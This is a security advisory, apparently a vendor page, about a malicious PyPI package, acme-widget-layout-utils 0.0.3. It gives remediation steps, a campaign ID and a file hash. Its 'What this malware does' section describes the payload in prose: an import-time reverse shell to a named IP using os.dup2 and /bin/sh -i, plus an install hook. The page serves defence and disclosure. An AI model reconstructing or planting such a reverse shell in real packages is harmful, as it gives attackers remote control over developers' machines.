Which versions of acme-widget-layout-utils are malicious?

The following PyPI versions of acme-widget-layout-utils are flagged malicious: 0.0.3. Treat any of these as compromised.

How do I remediate acme-widget-layout-utils if I installed it?

Remove acme-widget-layout-utils from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is acme-widget-layout-utils part of a known attack campaign?

Yes — acme-widget-layout-utils is associated with the IN-MAL-2026-005357 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect acme-widget-layout-utils in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking acme-widget-layout-utils and packages like it before any post-install script runs.

Malicious package

acme-widget-layout-utilsPyPI

Malicious code in acme-widget-layout-utils (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-5545

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

pip uninstall acme-widget-layout-utils

What this malware does

On first import, src/acme_widget_layout_utils/init.py (lines 13-17) opens a TCP socket to 34.69.137.236:80, duplicates stdin/stdout/stderr onto the socket via os.dup2, and execs /bin/sh -i — a textbook interactive reverse shell handing remote shell access to whoever controls 34.69.137.236. The behavior is unconditional and fires the moment any consumer runs import acme_widget_layout_utils. setup.py additionally installs a custom install command that writes /tmp/pypi_install_hook_marker.txt at install time, corroborating the package's role as a deliberately crafted attack artifact. The package name suggests benign UI/layout utilities and contains no such functionality; the pyproject.toml description openly self-identifies as a 'pentest C2 target', but the package is published on public PyPI under a generic name where any developer searching for widget/layout helpers can incidentally install and be backdoored. README's 'authorized pentest' framing does not change installer-side impact.

Malicious versions

1 flagged

0.0.3

Indicators of compromise (SHA-256)

42e53a38c2df70a3c6a2a24b2484840e6a163f2e1a9b91236a2aa7a9ec004600

Frequently asked questions

No. acme-widget-layout-utils on PyPI has been identified as a malicious package (version 0.0.3 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005357

References

pypi.org

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection